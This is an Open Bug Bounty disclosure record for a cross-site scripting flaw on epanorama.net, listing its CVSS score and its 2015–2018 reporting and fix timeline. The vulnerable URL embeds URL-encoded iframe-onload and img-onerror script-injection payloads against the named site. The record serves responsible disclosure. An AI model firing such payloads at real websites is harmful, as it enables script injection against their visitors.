epanorama.net XSS vulnerability

2015-03-16T13:32:00
ID OBB:55801
Type openbugbounty
Reporter guest
Modified 2018-03-14T23:11:00

Description

Open Bug Bounty ID: OBB-55801

Description| Value
---|---
Affected Website:| epanorama.net
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.epanorama.net/results.html?cx=partner-pub-3257650267345122%3Am8l15-vldxh&cof=FORID%3A10&ie=ISO-8859-1&q=%3Ciframe%2F+%2Fonload%3Dalert%28%2FXSSPOSED%2F%29%3E%3C%2Fiframe%3E+&sa=Search&siteurl=www.epanorama.net%2Fmulti.php%3Fsearch%3D%26keyword%3D%2522%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253Dalert%2528%2527XSSPOSED%2527%2529%253B%253E&ref=www.epanorama.net%2Fcircuits%2Fvga2tv%2F&ss=59j3481j2

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 16 March, 2015 13:32 GMT
Vulnerability Verified:| 16 March, 2015 13:34 GMT
Website Operator Notified:| 16 March, 2015 13:34 GMT
Vulnerability Published:| 16 March, 2015 13:34 GMT [without any technical details]
Vulnerability Fixed:| 14 March, 2018 23:11 GMT
Public Disclosure:| 14 March, 2018 23:11 GMT